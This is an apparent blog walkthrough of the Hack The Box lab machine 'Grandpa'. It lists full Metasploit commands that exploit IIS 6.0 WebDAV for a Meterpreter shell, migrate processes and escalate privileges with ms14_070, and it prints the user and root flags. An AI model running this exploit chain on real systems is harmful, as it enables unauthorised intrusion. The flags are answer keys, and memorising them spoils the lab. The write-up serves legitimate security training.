top of page

Grandpa


As usual let's start with nmap:

nmap -sV -sC 10.129.95.233

We can see that port 80 is open so let's check the website. Open your browser and type in the url bar : 10.129.95.233


Let's do a curl to get more info:

curl -I 10.129.95.233

We can see that the web server is on Microsoft-IIS/6.0.


I googled "IIS6 exploit" and found this article from rapid7:


Let's follow the steps in the article.


First, open a new command prompt and type the following to load metasploit:

msfconsole

As per the article let's type:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

show options

We need to set LHOST and RHOSTS as they are required fields.


LHOST (local host) should be set with the IP of your machine. If you don't know the IP of your machine, you can find out using ifconfig. My machine's IP is 10.10.14.21, yours will be different.

set LHOST 10.10.14.21

RHOST (remote host) is the target machine's IP:

set RHOSTS 10.129.95.233

exploit

It worked!


shell

whoami

We are nt authority\network service

Great!


The shell is not great though. We need to escalate our privileges now.


Lets exit to return to the meterpreter shell

exit


Privilege Escalation


Let's use Lester, or Exploit Suggester. Lester is a module that scan the target for vulnerabilities. It is not actively exploiting them though, just scanning for them. However, you need to have a session opened on the target already to be able to use Lester. But we have a session already so let's try this.


run post/multi/recon/local_exploit_suggester

We get several exploits - let's pick exploit/windows/local/ms14_070_tcpip_ioctl


But first, let's see what processes are running on the target machine:


ps

We need to find a process that is running under NT AUTHORITY\NETWORK SERVICE


Let's pick davcdata.exe

ps | grep dav

The process ID for davcdata.exe is PID 2768


Let's migrate to this process using:

migrate 2768

background

This tells us it is session 1

use exploit/windows/local/ms14_070_tcpip_ioctl

set session 1

show options

set LHOST 10.10.14.21

exploit

It worked!!



shell


cd C:\Documents and Settings\Harry\Desktop
dir
type user.txt

bdff5ec67c3cff017f2bedc146a5d869


Congratulations! You found the user flag!


cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt

9359e905a2c35f861f6a57cecf28bb7b

Congratulations! You found the root flag!

151 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page